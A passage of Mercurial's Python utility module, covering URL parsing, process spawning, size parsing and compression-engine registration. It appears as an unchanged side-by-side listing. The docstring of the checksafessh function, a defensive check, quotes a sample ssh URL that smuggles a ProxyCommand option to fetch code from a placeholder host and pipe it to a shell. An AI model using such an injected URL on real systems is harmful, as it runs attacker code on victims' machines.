2593 2593 for line in chunk.splitlines():
2594 2594 yield line
2595 2595
2596 2596 def expandpath(path):
2597 2597 return os.path.expanduser(os.path.expandvars(path))
2598 2598
2599 2599 def hgcmd():
2600 2600 """Return the command used to execute current hg
2601 2601
2602 2602 This is different from hgexecutable() because on Windows we want
2603 2603 to avoid things opening new shell windows like batch files, so we
2604 2604 get either the python call or current executable.
2605 2605 """
2606 2606 if mainfrozen():
2607 2607 if getattr(sys, 'frozen', None) == 'macosx_app':
2608 2608 # Env variable set by py2app
2609 2609 return [encoding.environ['EXECUTABLEPATH']]
2610 2610 else:
2611 2611 return [pycompat.sysexecutable]
2612 2612 return gethgcmd()
2613 2613
2614 2614 def rundetached(args, condfn):
2615 2615 """Execute the argument list in a detached process.
2616 2616
2617 2617 condfn is a callable which is called repeatedly and should return
2618 2618 True once the child process is known to have started successfully.
2619 2619 At this point, the child process PID is returned. If the child
2620 2620 process fails to start or finishes before condfn() evaluates to
2621 2621 True, return -1.
2622 2622 """
2623 2623 # Windows case is easier because the child process is either
2624 2624 # successfully starting and validating the condition or exiting
2625 2625 # on failure. We just poll on its PID. On Unix, if the child
2626 2626 # process fails to start, it will be left in a zombie state until
2627 2627 # the parent wait on it, which we cannot do since we expect a long
2628 2628 # running process on success. Instead we listen for SIGCHLD telling
2629 2629 # us our child process terminated.
2630 2630 terminated = set()
2631 2631 def handler(signum, frame):
2632 2632 terminated.add(os.wait())
2633 2633 prevhandler = None
2634 2634 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2635 2635 if SIGCHLD is not None:
2636 2636 prevhandler = signal.signal(SIGCHLD, handler)
2637 2637 try:
2638 2638 pid = spawndetached(args)
2639 2639 while not condfn():
2640 2640 if ((pid in terminated or not testpid(pid))
2641 2641 and not condfn()):
2642 2642 return -1
2643 2643 time.sleep(0.1)
2644 2644 return pid
2645 2645 finally:
2646 2646 if prevhandler is not None:
2647 2647 signal.signal(signal.SIGCHLD, prevhandler)
2648 2648
2649 2649 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2650 2650 """Return the result of interpolating items in the mapping into string s.
2651 2651
2652 2652 prefix is a single character string, or a two character string with
2653 2653 a backslash as the first character if the prefix needs to be escaped in
2654 2654 a regular expression.
2655 2655
2656 2656 fn is an optional function that will be applied to the replacement text
2657 2657 just before replacement.
2658 2658
2659 2659 escape_prefix is an optional flag that allows using doubled prefix for
2660 2660 its escaping.
2661 2661 """
2662 2662 fn = fn or (lambda s: s)
2663 2663 patterns = '|'.join(mapping.keys())
2664 2664 if escape_prefix:
2665 2665 patterns += '|' + prefix
2666 2666 if len(prefix) > 1:
2667 2667 prefix_char = prefix[1:]
2668 2668 else:
2669 2669 prefix_char = prefix
2670 2670 mapping[prefix_char] = prefix_char
2671 2671 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2672 2672 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2673 2673
2674 2674 def getport(port):
2675 2675 """Return the port for a given network service.
2676 2676
2677 2677 If port is an integer, it's returned as is. If it's a string, it's
2678 2678 looked up using socket.getservbyname(). If there's no matching
2679 2679 service, error.Abort is raised.
2680 2680 """
2681 2681 try:
2682 2682 return int(port)
2683 2683 except ValueError:
2684 2684 pass
2685 2685
2686 2686 try:
2687 2687 return socket.getservbyname(port)
2688 2688 except socket.error:
2689 2689 raise Abort(_("no port number associated with service '%s'") % port)
2690 2690
2691 2691 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2692 2692 '0': False, 'no': False, 'false': False, 'off': False,
2693 2693 'never': False}
2694 2694
2695 2695 def parsebool(s):
2696 2696 """Parse s into a boolean.
2697 2697
2698 2698 If s is not a valid boolean, returns None.
2699 2699 """
2700 2700 return _booleans.get(s.lower(), None)
2701 2701
2702 2702 _hextochr = dict((a + b, chr(int(a + b, 16)))
2703 2703 for a in string.hexdigits for b in string.hexdigits)
2704 2704
2705 2705 class url(object):
2706 2706 r"""Reliable URL parser.
2707 2707
2708 2708 This parses URLs and provides attributes for the following
2709 2709 components:
2710 2710
2711 2711 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2712 2712
2713 2713 Missing components are set to None. The only exception is
2714 2714 fragment, which is set to '' if present but empty.
2715 2715
2716 2716 If parsefragment is False, fragment is included in query. If
2717 2717 parsequery is False, query is included in path. If both are
2718 2718 False, both fragment and query are included in path.
2719 2719
2720 2720 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2721 2721
2722 2722 Note that for backward compatibility reasons, bundle URLs do not
2723 2723 take host names. That means 'bundle://../' has a path of '../'.
2724 2724
2725 2725 Examples:
2726 2726
2727 2727 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2728 2728 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2729 2729 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2730 2730 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2731 2731 >>> url(b'file:///home/joe/repo')
2732 2732 <url scheme: 'file', path: '/home/joe/repo'>
2733 2733 >>> url(b'file:///c:/temp/foo/')
2734 2734 <url scheme: 'file', path: 'c:/temp/foo/'>
2735 2735 >>> url(b'bundle:foo')
2736 2736 <url scheme: 'bundle', path: 'foo'>
2737 2737 >>> url(b'bundle://../foo')
2738 2738 <url scheme: 'bundle', path: '../foo'>
2739 2739 >>> url(br'c:\foo\bar')
2740 2740 <url path: 'c:\\foo\\bar'>
2741 2741 >>> url(br'\\blah\blah\blah')
2742 2742 <url path: '\\\\blah\\blah\\blah'>
2743 2743 >>> url(br'\\blah\blah\blah#baz')
2744 2744 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2745 2745 >>> url(br'file:///C:\users\me')
2746 2746 <url scheme: 'file', path: 'C:\\users\\me'>
2747 2747
2748 2748 Authentication credentials:
2749 2749
2750 2750 >>> url(b'ssh://joe:xyz@x/repo')
2751 2751 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2752 2752 >>> url(b'ssh://joe@x/repo')
2753 2753 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2754 2754
2755 2755 Query strings and fragments:
2756 2756
2757 2757 >>> url(b'http://host/a?b#c')
2758 2758 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2759 2759 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2760 2760 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2761 2761
2762 2762 Empty path:
2763 2763
2764 2764 >>> url(b'')
2765 2765 <url path: ''>
2766 2766 >>> url(b'#a')
2767 2767 <url path: '', fragment: 'a'>
2768 2768 >>> url(b'http://host/')
2769 2769 <url scheme: 'http', host: 'host', path: ''>
2770 2770 >>> url(b'http://host/#a')
2771 2771 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2772 2772
2773 2773 Only scheme:
2774 2774
2775 2775 >>> url(b'http:')
2776 2776 <url scheme: 'http'>
2777 2777 """
2778 2778
2779 2779 _safechars = "!~*'()+"
2780 2780 _safepchars = "/!~*'()+:\\"
2781 2781 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2782 2782
2783 2783 def __init__(self, path, parsequery=True, parsefragment=True):
2784 2784 # We slowly chomp away at path until we have only the path left
2785 2785 self.scheme = self.user = self.passwd = self.host = None
2786 2786 self.port = self.path = self.query = self.fragment = None
2787 2787 self._localpath = True
2788 2788 self._hostport = ''
2789 2789 self._origpath = path
2790 2790
2791 2791 if parsefragment and '#' in path:
2792 2792 path, self.fragment = path.split('#', 1)
2793 2793
2794 2794 # special case for Windows drive letters and UNC paths
2795 2795 if hasdriveletter(path) or path.startswith('\\\\'):
2796 2796 self.path = path
2797 2797 return
2798 2798
2799 2799 # For compatibility reasons, we can't handle bundle paths as
2800 2800 # normal URLS
2801 2801 if path.startswith('bundle:'):
2802 2802 self.scheme = 'bundle'
2803 2803 path = path[7:]
2804 2804 if path.startswith('//'):
2805 2805 path = path[2:]
2806 2806 self.path = path
2807 2807 return
2808 2808
2809 2809 if self._matchscheme(path):
2810 2810 parts = path.split(':', 1)
2811 2811 if parts[0]:
2812 2812 self.scheme, path = parts
2813 2813 self._localpath = False
2814 2814
2815 2815 if not path:
2816 2816 path = None
2817 2817 if self._localpath:
2818 2818 self.path = ''
2819 2819 return
2820 2820 else:
2821 2821 if self._localpath:
2822 2822 self.path = path
2823 2823 return
2824 2824
2825 2825 if parsequery and '?' in path:
2826 2826 path, self.query = path.split('?', 1)
2827 2827 if not path:
2828 2828 path = None
2829 2829 if not self.query:
2830 2830 self.query = None
2831 2831
2832 2832 # // is required to specify a host/authority
2833 2833 if path and path.startswith('//'):
2834 2834 parts = path[2:].split('/', 1)
2835 2835 if len(parts) > 1:
2836 2836 self.host, path = parts
2837 2837 else:
2838 2838 self.host = parts[0]
2839 2839 path = None
2840 2840 if not self.host:
2841 2841 self.host = None
2842 2842 # path of file:///d is /d
2843 2843 # path of file:///d:/ is d:/, not /d:/
2844 2844 if path and not hasdriveletter(path):
2845 2845 path = '/' + path
2846 2846
2847 2847 if self.host and '@' in self.host:
2848 2848 self.user, self.host = self.host.rsplit('@', 1)
2849 2849 if ':' in self.user:
2850 2850 self.user, self.passwd = self.user.split(':', 1)
2851 2851 if not self.host:
2852 2852 self.host = None
2853 2853
2854 2854 # Don't split on colons in IPv6 addresses without ports
2855 2855 if (self.host and ':' in self.host and
2856 2856 not (self.host.startswith('[') and self.host.endswith(']'))):
2857 2857 self._hostport = self.host
2858 2858 self.host, self.port = self.host.rsplit(':', 1)
2859 2859 if not self.host:
2860 2860 self.host = None
2861 2861
2862 2862 if (self.host and self.scheme == 'file' and
2863 2863 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2864 2864 raise Abort(_('file:// URLs can only refer to localhost'))
2865 2865
2866 2866 self.path = path
2867 2867
2868 2868 # leave the query string escaped
2869 2869 for a in ('user', 'passwd', 'host', 'port',
2870 2870 'path', 'fragment'):
2871 2871 v = getattr(self, a)
2872 2872 if v is not None:
2873 2873 setattr(self, a, urlreq.unquote(v))
2874 2874
2875 2875 @encoding.strmethod
2876 2876 def __repr__(self):
2877 2877 attrs = []
2878 2878 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2879 2879 'query', 'fragment'):
2880 2880 v = getattr(self, a)
2881 2881 if v is not None:
2882 2882 attrs.append('%s: %r' % (a, v))
2883 2883 return '<url %s>' % ', '.join(attrs)
2884 2884
2885 2885 def __bytes__(self):
2886 2886 r"""Join the URL's components back into a URL string.
2887 2887
2888 2888 Examples:
2889 2889
2890 2890 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2891 2891 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2892 2892 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2893 2893 'http://user:pw@host:80/?foo=bar&baz=42'
2894 2894 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2895 2895 'http://user:pw@host:80/?foo=bar%3dbaz'
2896 2896 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2897 2897 'ssh://user:pw@[::1]:2200//home/joe#'
2898 2898 >>> bytes(url(b'http://localhost:80//'))
2899 2899 'http://localhost:80//'
2900 2900 >>> bytes(url(b'http://localhost:80/'))
2901 2901 'http://localhost:80/'
2902 2902 >>> bytes(url(b'http://localhost:80'))
2903 2903 'http://localhost:80/'
2904 2904 >>> bytes(url(b'bundle:foo'))
2905 2905 'bundle:foo'
2906 2906 >>> bytes(url(b'bundle://../foo'))
2907 2907 'bundle:../foo'
2908 2908 >>> bytes(url(b'path'))
2909 2909 'path'
2910 2910 >>> bytes(url(b'file:///tmp/foo/bar'))
2911 2911 'file:///tmp/foo/bar'
2912 2912 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2913 2913 'file:///c:/tmp/foo/bar'
2914 2914 >>> print(url(br'bundle:foo\bar'))
2915 2915 bundle:foo\bar
2916 2916 >>> print(url(br'file:///D:\data\hg'))
2917 2917 file:///D:\data\hg
2918 2918 """
2919 2919 if self._localpath:
2920 2920 s = self.path
2921 2921 if self.scheme == 'bundle':
2922 2922 s = 'bundle:' + s
2923 2923 if self.fragment:
2924 2924 s += '#' + self.fragment
2925 2925 return s
2926 2926
2927 2927 s = self.scheme + ':'
2928 2928 if self.user or self.passwd or self.host:
2929 2929 s += '//'
2930 2930 elif self.scheme and (not self.path or self.path.startswith('/')
2931 2931 or hasdriveletter(self.path)):
2932 2932 s += '//'
2933 2933 if hasdriveletter(self.path):
2934 2934 s += '/'
2935 2935 if self.user:
2936 2936 s += urlreq.quote(self.user, safe=self._safechars)
2937 2937 if self.passwd:
2938 2938 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2939 2939 if self.user or self.passwd:
2940 2940 s += '@'
2941 2941 if self.host:
2942 2942 if not (self.host.startswith('[') and self.host.endswith(']')):
2943 2943 s += urlreq.quote(self.host)
2944 2944 else:
2945 2945 s += self.host
2946 2946 if self.port:
2947 2947 s += ':' + urlreq.quote(self.port)
2948 2948 if self.host:
2949 2949 s += '/'
2950 2950 if self.path:
2951 2951 # TODO: similar to the query string, we should not unescape the
2952 2952 # path when we store it, the path might contain '%2f' = '/',
2953 2953 # which we should *not* escape.
2954 2954 s += urlreq.quote(self.path, safe=self._safepchars)
2955 2955 if self.query:
2956 2956 # we store the query in escaped form.
2957 2957 s += '?' + self.query
2958 2958 if self.fragment is not None:
2959 2959 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2960 2960 return s
2961 2961
2962 2962 __str__ = encoding.strmethod(__bytes__)
2963 2963
2964 2964 def authinfo(self):
2965 2965 user, passwd = self.user, self.passwd
2966 2966 try:
2967 2967 self.user, self.passwd = None, None
2968 2968 s = bytes(self)
2969 2969 finally:
2970 2970 self.user, self.passwd = user, passwd
2971 2971 if not self.user:
2972 2972 return (s, None)
2973 2973 # authinfo[1] is passed to urllib2 password manager, and its
2974 2974 # URIs must not contain credentials. The host is passed in the
2975 2975 # URIs list because Python < 2.4.3 uses only that to search for
2976 2976 # a password.
2977 2977 return (s, (None, (s, self.host),
2978 2978 self.user, self.passwd or ''))
2979 2979
2980 2980 def isabs(self):
2981 2981 if self.scheme and self.scheme != 'file':
2982 2982 return True # remote URL
2983 2983 if hasdriveletter(self.path):
2984 2984 return True # absolute for our purposes - can't be joined()
2985 2985 if self.path.startswith(br'\\'):
2986 2986 return True # Windows UNC path
2987 2987 if self.path.startswith('/'):
2988 2988 return True # POSIX-style
2989 2989 return False
2990 2990
2991 2991 def localpath(self):
2992 2992 if self.scheme == 'file' or self.scheme == 'bundle':
2993 2993 path = self.path or '/'
2994 2994 # For Windows, we need to promote hosts containing drive
2995 2995 # letters to paths with drive letters.
2996 2996 if hasdriveletter(self._hostport):
2997 2997 path = self._hostport + '/' + self.path
2998 2998 elif (self.host is not None and self.path
2999 2999 and not hasdriveletter(path)):
3000 3000 path = '/' + path
3001 3001 return path
3002 3002 return self._origpath
3003 3003
3004 3004 def islocal(self):
3005 3005 '''whether localpath will return something that posixfile can open'''
3006 3006 return (not self.scheme or self.scheme == 'file'
3007 3007 or self.scheme == 'bundle')
3008 3008
3009 3009 def hasscheme(path):
3010 3010 return bool(url(path).scheme)
3011 3011
3012 3012 def hasdriveletter(path):
3013 3013 return path and path[1:2] == ':' and path[0:1].isalpha()
3014 3014
3015 3015 def urllocalpath(path):
3016 3016 return url(path, parsequery=False, parsefragment=False).localpath()
3017 3017
3018 3018 def checksafessh(path):
3019 3019 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3020 3020
3021 3021 This is a sanity check for ssh urls. ssh will parse the first item as
3022 3022 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3023 3023 Let's prevent these potentially exploited urls entirely and warn the
3024 3024 user.
3025 3025
3026 3026 Raises an error.Abort when the url is unsafe.
3027 3027 """
3028 3028 path = urlreq.unquote(path)
3029 3029 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3030 3030 raise error.Abort(_('potentially unsafe url: %r') %
3031 3031 (path,))
3032 3032
3033 3033 def hidepassword(u):
3034 3034 '''hide user credential in a url string'''
3035 3035 u = url(u)
3036 3036 if u.passwd:
3037 3037 u.passwd = '***'
3038 3038 return bytes(u)
3039 3039
3040 3040 def removeauth(u):
3041 3041 '''remove all authentication information from a url string'''
3042 3042 u = url(u)
3043 3043 u.user = u.passwd = None
3044 3044 return str(u)
3045 3045
3046 3046 timecount = unitcountfn(
3047 3047 (1, 1e3, _('%.0f s')),
3048 3048 (100, 1, _('%.1f s')),
3049 3049 (10, 1, _('%.2f s')),
3050 3050 (1, 1, _('%.3f s')),
3051 3051 (100, 0.001, _('%.1f ms')),
3052 3052 (10, 0.001, _('%.2f ms')),
3053 3053 (1, 0.001, _('%.3f ms')),
3054 3054 (100, 0.000001, _('%.1f us')),
3055 3055 (10, 0.000001, _('%.2f us')),
3056 3056 (1, 0.000001, _('%.3f us')),
3057 3057 (100, 0.000000001, _('%.1f ns')),
3058 3058 (10, 0.000000001, _('%.2f ns')),
3059 3059 (1, 0.000000001, _('%.3f ns')),
3060 3060 )
3061 3061
3062 3062 _timenesting = [0]
3063 3063
3064 3064 def timed(func):
3065 3065 '''Report the execution time of a function call to stderr.
3066 3066
3067 3067 During development, use as a decorator when you need to measure
3068 3068 the cost of a function, e.g. as follows:
3069 3069
3070 3070 @util.timed
3071 3071 def foo(a, b, c):
3072 3072 pass
3073 3073 '''
3074 3074
3075 3075 def wrapper(*args, **kwargs):
3076 3076 start = timer()
3077 3077 indent = 2
3078 3078 _timenesting[0] += indent
3079 3079 try:
3080 3080 return func(*args, **kwargs)
3081 3081 finally:
3082 3082 elapsed = timer() - start
3083 3083 _timenesting[0] -= indent
3084 3084 stderr.write('%s%s: %s\n' %
3085 3085 (' ' * _timenesting[0], func.__name__,
3086 3086 timecount(elapsed)))
3087 3087 return wrapper
3088 3088
3089 3089 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3090 3090 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3091 3091
3092 3092 def sizetoint(s):
3093 3093 '''Convert a space specifier to a byte count.
3094 3094
3095 3095 >>> sizetoint(b'30')
3096 3096 30
3097 3097 >>> sizetoint(b'2.2kb')
3098 3098 2252
3099 3099 >>> sizetoint(b'6M')
3100 3100 6291456
3101 3101 '''
3102 3102 t = s.strip().lower()
3103 3103 try:
3104 3104 for k, u in _sizeunits:
3105 3105 if t.endswith(k):
3106 3106 return int(float(t[:-len(k)]) * u)
3107 3107 return int(t)
3108 3108 except ValueError:
3109 3109 raise error.ParseError(_("couldn't parse size: %s") % s)
3110 3110
3111 3111 class hooks(object):
3112 3112 '''A collection of hook functions that can be used to extend a
3113 3113 function's behavior. Hooks are called in lexicographic order,
3114 3114 based on the names of their sources.'''
3115 3115
3116 3116 def __init__(self):
3117 3117 self._hooks = []
3118 3118
3119 3119 def add(self, source, hook):
3120 3120 self._hooks.append((source, hook))
3121 3121
3122 3122 def __call__(self, *args):
3123 3123 self._hooks.sort(key=lambda x: x[0])
3124 3124 results = []
3125 3125 for source, hook in self._hooks:
3126 3126 results.append(hook(*args))
3127 3127 return results
3128 3128
3129 3129 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%s', depth=0):
3130 3130 '''Yields lines for a nicely formatted stacktrace.
3131 3131 Skips the 'skip' last entries, then return the last 'depth' entries.
3132 3132 Each file+linenumber is formatted according to fileline.
3133 3133 Each line is formatted according to line.
3134 3134 If line is None, it yields:
3135 3135 length of longest filepath+line number,
3136 3136 filepath+linenumber,
3137 3137 function
3138 3138
3139 3139 Not be used in production code but very convenient while developing.
3140 3140 '''
3141 3141 entries = [(fileline % (fn, ln), func)
3142 3142 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3143 3143 ][-depth:]
3144 3144 if entries:
3145 3145 fnmax = max(len(entry[0]) for entry in entries)
3146 3146 for fnln, func in entries:
3147 3147 if line is None:
3148 3148 yield (fnmax, fnln, func)
3149 3149 else:
3150 3150 yield line % (fnmax, fnln, func)
3151 3151
3152 3152 def debugstacktrace(msg='stacktrace', skip=0,
3153 3153 f=stderr, otherf=stdout, depth=0):
3154 3154 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3155 3155 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3156 3156 By default it will flush stdout first.
3157 3157 It can be used everywhere and intentionally does not require an ui object.
3158 3158 Not be used in production code but very convenient while developing.
3159 3159 '''
3160 3160 if otherf:
3161 3161 otherf.flush()
3162 3162 f.write('%s at:\n' % msg.rstrip())
3163 3163 for line in getstackframes(skip + 1, depth=depth):
3164 3164 f.write(line)
3165 3165 f.flush()
3166 3166
3167 3167 class dirs(object):
3168 3168 '''a multiset of directory names from a dirstate or manifest'''
3169 3169
3170 3170 def __init__(self, map, skip=None):
3171 3171 self._dirs = {}
3172 3172 addpath = self.addpath
3173 3173 if safehasattr(map, 'iteritems') and skip is not None:
3174 3174 for f, s in map.iteritems():
3175 3175 if s[0] != skip:
3176 3176 addpath(f)
3177 3177 else:
3178 3178 for f in map:
3179 3179 addpath(f)
3180 3180
3181 3181 def addpath(self, path):
3182 3182 dirs = self._dirs
3183 3183 for base in finddirs(path):
3184 3184 if base in dirs:
3185 3185 dirs[base] += 1
3186 3186 return
3187 3187 dirs[base] = 1
3188 3188
3189 3189 def delpath(self, path):
3190 3190 dirs = self._dirs
3191 3191 for base in finddirs(path):
3192 3192 if dirs[base] > 1:
3193 3193 dirs[base] -= 1
3194 3194 return
3195 3195 del dirs[base]
3196 3196
3197 3197 def __iter__(self):
3198 3198 return iter(self._dirs)
3199 3199
3200 3200 def __contains__(self, d):
3201 3201 return d in self._dirs
3202 3202
3203 3203 if safehasattr(parsers, 'dirs'):
3204 3204 dirs = parsers.dirs
3205 3205
3206 3206 def finddirs(path):
3207 3207 pos = path.rfind('/')
3208 3208 while pos != -1:
3209 3209 yield path[:pos]
3210 3210 pos = path.rfind('/', 0, pos)
3211 3211
3212 3212 # compression code
3213 3213
3214 3214 SERVERROLE = 'server'
3215 3215 CLIENTROLE = 'client'
3216 3216
3217 3217 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3218 3218 (u'name', u'serverpriority',
3219 3219 u'clientpriority'))
3220 3220
3221 3221 class compressormanager(object):
3222 3222 """Holds registrations of various compression engines.
3223 3223
3224 3224 This class essentially abstracts the differences between compression
3225 3225 engines to allow new compression formats to be added easily, possibly from
3226 3226 extensions.
3227 3227
3228 3228 Compressors are registered against the global instance by calling its
3229 3229 ``register()`` method.
3230 3230 """
3231 3231 def __init__(self):
3232 3232 self._engines = {}
3233 3233 # Bundle spec human name to engine name.
3234 3234 self._bundlenames = {}
3235 3235 # Internal bundle identifier to engine name.
3236 3236 self._bundletypes = {}
3237 3237 # Revlog header to engine name.
3238 3238 self._revlogheaders = {}
3239 3239 # Wire proto identifier to engine name.
3240 3240 self._wiretypes = {}
3241 3241
3242 3242 def __getitem__(self, key):
3243 3243 return self._engines[key]
3244 3244
3245 3245 def __contains__(self, key):
3246 3246 return key in self._engines
3247 3247
3248 3248 def __iter__(self):
3249 3249 return iter(self._engines.keys())
3250 3250
3251 3251 def register(self, engine):
3252 3252 """Register a compression engine with the manager.
3253 3253
3254 3254 The argument must be a ``compressionengine`` instance.
3255 3255 """
3256 3256 if not isinstance(engine, compressionengine):
3257 3257 raise ValueError(_('argument must be a compressionengine'))
3258 3258
3259 3259 name = engine.name()
3260 3260
3261 3261 if name in self._engines:
3262 3262 raise error.Abort(_('compression engine %s already registered') %
3263 3263 name)
3264 3264
3265 3265 bundleinfo = engine.bundletype()
3266 3266 if bundleinfo:
3267 3267 bundlename, bundletype = bundleinfo
3268 3268
3269 3269 if bundlename in self._bundlenames:
3270 3270 raise error.Abort(_('bundle name %s already registered') %
3271 3271 bundlename)
3272 3272 if bundletype in self._bundletypes:
3273 3273 raise error.Abort(_('bundle type %s already registered by %s') %
3274 3274 (bundletype, self._bundletypes[bundletype]))
3275 3275
3276 3276 # No external facing name declared.
3277 3277 if bundlename:
3278 3278 self._bundlenames[bundlename] = name
3279 3279
3280 3280 self._bundletypes[bundletype] = name
3281 3281
3282 3282 wiresupport = engine.wireprotosupport()
3283 3283 if wiresupport:
3284 3284 wiretype = wiresupport.name
3285 3285 if wiretype in self._wiretypes:
3286 3286 raise error.Abort(_('wire protocol compression %s already '
3287 3287 'registered by %s') %
3288 3288 (wiretype, self._wiretypes[wiretype]))
3289 3289
3290 3290 self._wiretypes[wiretype] = name
3291 3291
3292 3292 revlogheader = engine.revlogheader()
3293 3293 if revlogheader and revlogheader in self._revlogheaders:
3294 3294 raise error.Abort(_('revlog header %s already registered by %s') %
3295 3295 (revlogheader, self._revlogheaders[revlogheader]))
3296 3296
3297 3297 if revlogheader:
3298 3298 self._revlogheaders[revlogheader] = name
3299 3299
3300 3300 self._engines[name] = engine
3301 3301
3302 3302 @property
3303 3303 def supportedbundlenames(self):
3304 3304 return set(self._bundlenames.keys())
3305 3305
3306 3306 @property
3307 3307 def supportedbundletypes(self):
3308 3308 return set(self._bundletypes.keys())
3309 3309
3310 3310 def forbundlename(self, bundlename):
3311 3311 """Obtain a compression engine registered to a bundle name.
3312 3312
3313 3313 Will raise KeyError if the bundle type isn't registered.
3314 3314
3315 3315 Will abort if the engine is known but not available.
3316 3316 """
3317 3317 engine = self._engines[self._bundlenames[bundlename]]
3318 3318 if not engine.available():
3319 3319 raise error.Abort(_('compression engine %s could not be loaded') %
3320 3320 engine.name())
3321 3321 return engine
3322 3322
3323 3323 def forbundletype(self, bundletype):
3324 3324 """Obtain a compression engine registered to a bundle type.
3325 3325
3326 3326 Will raise KeyError if the bundle type isn't registered.
3327 3327
3328 3328 Will abort if the engine is known but not available.
3329 3329 """
3330 3330 engine = self._engines[self._bundletypes[bundletype]]
3331 3331 if not engine.available():
3332 3332 raise error.Abort(_('compression engine %s could not be loaded') %
3333 3333 engine.name())
3334 3334 return engine
3335 3335
3336 3336 def supportedwireengines(self, role, onlyavailable=True):
3337 3337 """Obtain compression engines that support the wire protocol.
3338 3338
3339 3339 Returns a list of engines in prioritized order, most desired first.
3340 3340
3341 3341 If ``onlyavailable`` is set, filter out engines that can't be
3342 3342 loaded.
3343 3343 """
3344 3344 assert role in (SERVERROLE, CLIENTROLE)
3345 3345
3346 3346 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3347 3347
3348 3348 engines = [self._engines[e] for e in self._wiretypes.values()]
3349 3349 if onlyavailable:
3350 3350 engines = [e for e in engines if e.available()]
3351 3351
3352 3352 def getkey(e):
3353 3353 # Sort first by priority, highest first. In case of tie, sort
3354 3354 # alphabetically. This is arbitrary, but ensures output is
3355 3355 # stable.
3356 3356 w = e.wireprotosupport()
3357 3357 return -1 * getattr(w, attr), w.name
3358 3358
3359 3359 return list(sorted(engines, key=getkey))
3360 3360
3361 3361 def forwiretype(self, wiretype):
3362 3362 engine = self._engines[self._wiretypes[wiretype]]
3363 3363 if not engine.available():
3364 3364 raise error.Abort(_('compression engine %s could not be loaded') %
3365 3365 engine.name())
3366 3366 return engine
3367 3367
3368 3368 def forrevlogheader(self, header):
3369 3369 """Obtain a compression engine registered to a revlog header.
3370 3370
3371 3371 Will raise KeyError if the revlog header value isn't registered.
3372 3372 """
3373 3373 return self._engines[self._revlogheaders[header]]
3374 3374
3375 3375 compengines = compressormanager()
3376 3376
3377 3377 class compressionengine(object):
3378 3378 """Base class for compression engines.
3379 3379
3380 3380 Compression engines must implement the interface defined by this class.
3381 3381 """
3382 3382 def name(self):
3383 3383 """Returns the name of the compression engine.
3384 3384
3385 3385 This is the key the engine is registered under.
3386 3386
3387 3387 This method must be implemented.
3388 3388 """
3389 3389 raise NotImplementedError()
3390 3390
3391 3391 def available(self):
3392 3392 """Whether the compression engine is available.
3393 3393
3394 3394 The intent of this method is to allow optional compression engines
3395 3395 that may not be available in all installations (such as engines relying
3396 3396 on C extensions that may not be present).
3397 3397 """
3398 3398 return True
3399 3399
3400 3400 def bundletype(self):
3401 3401 """Describes bundle identifiers for this engine.
3402 3402
3403 3403 If this compression engine isn't supported for bundles, returns None.
3404 3404
3405 3405 If this engine can be used for bundles, returns a 2-tuple of strings of
3406 3406 the user-facing "bundle spec" compression name and an internal
3407 3407 identifier used to denote the compression format within bundles. To
3408 3408 exclude the name from external usage, set the first element to ``None``.
3409 3409
3410 3410 If bundle compression is supported, the class must also implement
3411 3411 ``compressstream`` and `decompressorreader``.
3412 3412
3413 3413 The docstring of this method is used in the help system to tell users
3414 3414 about this engine.
3415 3415 """
3416 3416 return None
3417 3417
3418 3418 def wireprotosupport(self):
3419 3419 """Declare support for this compression format on the wire protocol.
3420 3420
3421 3421 If this compression engine isn't supported for compressing wire
3422 3422 protocol payloads, returns None.
3423 3423
3424 3424 Otherwise, returns ``compenginewireprotosupport`` with the following
3425 3425 fields:
3426 3426
3427 3427 * String format identifier
3428 3428 * Integer priority for the server
3429 3429 * Integer priority for the client
3430 3430
3431 3431 The integer priorities are used to order the advertisement of format
3432 3432 support by server and client. The highest integer is advertised
3433 3433 first. Integers with non-positive values aren't advertised.
3434 3434
3435 3435 The priority values are somewhat arbitrary and only used for default
3436 3436 ordering. The relative order can be changed via config options.
3437 3437
3438 3438 If wire protocol compression is supported, the class must also implement
3439 3439 ``compressstream`` and ``decompressorreader``.
3440 3440 """
3441 3441 return None
3442 3442
3443 3443 def revlogheader(self):
3444 3444 """Header added to revlog chunks that identifies this engine.
3445 3445
